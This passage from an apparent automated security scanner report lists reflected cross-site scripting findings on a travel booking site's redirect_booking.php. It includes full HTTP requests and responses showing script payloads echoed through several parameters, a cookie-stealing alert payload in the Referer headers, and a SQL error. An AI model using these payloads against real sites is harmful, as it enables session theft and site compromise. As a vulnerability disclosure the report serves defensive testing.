Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41c7e2a<script>alert(1)</script>8f741e95d30</i> You have an error in your SQL s
...[SNIP]...

2.22. http://parkcitytrips.com/redirect_booking.php [clone_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the clone_id request parameter is copied into the HTML document as plain text between tags. The payload ff8a3<script>alert(1)</script>a58df290f63 was submitted in the clone_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?clone_id=41ff8a3<script>alert(1)</script>a58df290f63&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:12:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 334

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41ff8a3<script>alert(1)</script>a58df290f63</i> You have an error in your SQL s
...[SNIP]...

2.23. http://parkcitytrips.com/redirect_booking.php [end-date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the end-date request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5941"-alert(1)-"bc91e321f46 was submitted in the end-date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011f5941"-alert(1)-"bc91e321f46&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
cument.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011f5941"-alert(1)-"bc91e321f46&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.24. http://parkcitytrips.com/redirect_booking.php [end-date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the end-date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d158"><script>alert(1)</script>dacd1aebd01 was submitted in the end-date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F20112d158"><script>alert(1)</script>dacd1aebd01&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F20112d158"><script>alert(1)</script>dacd1aebd01&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.25. http://parkcitytrips.com/redirect_booking.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the group_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a7d"><script>alert(1)</script>6b61750450b was submitted in the group_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=98235a7d"><script>alert(1)</script>6b61750450b&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=98235a7d"><script>alert(1)</script>6b61750450b&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.26. http://parkcitytrips.com/redirect_booking.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the group_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d30db"-alert(1)-"ee714c3b0ad was submitted in the group_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982d30db"-alert(1)-"ee714c3b0ad&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982d30db"-alert(1)-"ee714c3b0ad&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.27. http://parkcitytrips.com/redirect_booking.php [lodgingID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the lodgingID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76cdf"-alert(1)-"9d0654ede4c was submitted in the lodgingID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=10376cdf"-alert(1)-"9d0654ede4c&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=10376cdf"-alert(1)-"9d0654ede4c&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.28. http://parkcitytrips.com/redirect_booking.php [lodgingID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the lodgingID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40504"><script>alert(1)</script>3ff58aa380d was submitted in the lodgingID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=10340504"><script>alert(1)</script>3ff58aa380d&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=10340504"><script>alert(1)</script>3ff58aa380d&Submit.x=58&Submit.y=29">
...[SNIP]...

2.29. http://parkcitytrips.com/redirect_booking.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68501"><script>alert(1)</script>c29ca070f9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29&68501"><script>alert(1)</script>c29ca070f9e=1 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29&68501"><script>alert(1)</script>c29ca070f9e=1">
...[SNIP]...

2.30. http://parkcitytrips.com/redirect_booking.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b0b2"-alert(1)-"3c1198cec4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29&7b0b2"-alert(1)-"3c1198cec4e=1 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
{
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29&7b0b2"-alert(1)-"3c1198cec4e=1";
   
   }
}

</script>
...[SNIP]...

2.31. http://parkcitytrips.com/redirect_booking.php [nights parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the nights request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8fe"-alert(1)-"01657604edb was submitted in the nights parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1ce8fe"-alert(1)-"01657604edb&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?cloneID=41&group_id=982&rooms=1&nights=1ce8fe"-alert(1)-"01657604edb&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29";
   
   }
}

</script>
...[SNIP]...

2.32. http://parkcitytrips.com/redirect_booking.php [nights parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the nights request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cace"><script>alert(1)</script>5ffa664a41 was submitted in the nights parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=16cace"><script>alert(1)</script>5ffa664a41&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3093


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1&nights=16cace"><script>alert(1)</script>5ffa664a41&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.33. http://parkcitytrips.com/redirect_booking.php [rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the rooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408a4"><script>alert(1)</script>e5561156fbd was submitted in the rooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1408a4"><script>alert(1)</script>e5561156fbd&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?cloneID=41&group_id=982&rooms=1408a4"><script>alert(1)</script>e5561156fbd&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29">
...[SNIP]...

2.34. http://parkcitytrips.com/redirect_booking.php [rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The value of the rooms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf0d"-alert(1)-"37c3df7008b was submitted in the rooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=14bf0d"-alert(1)-"37c3df7008b&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
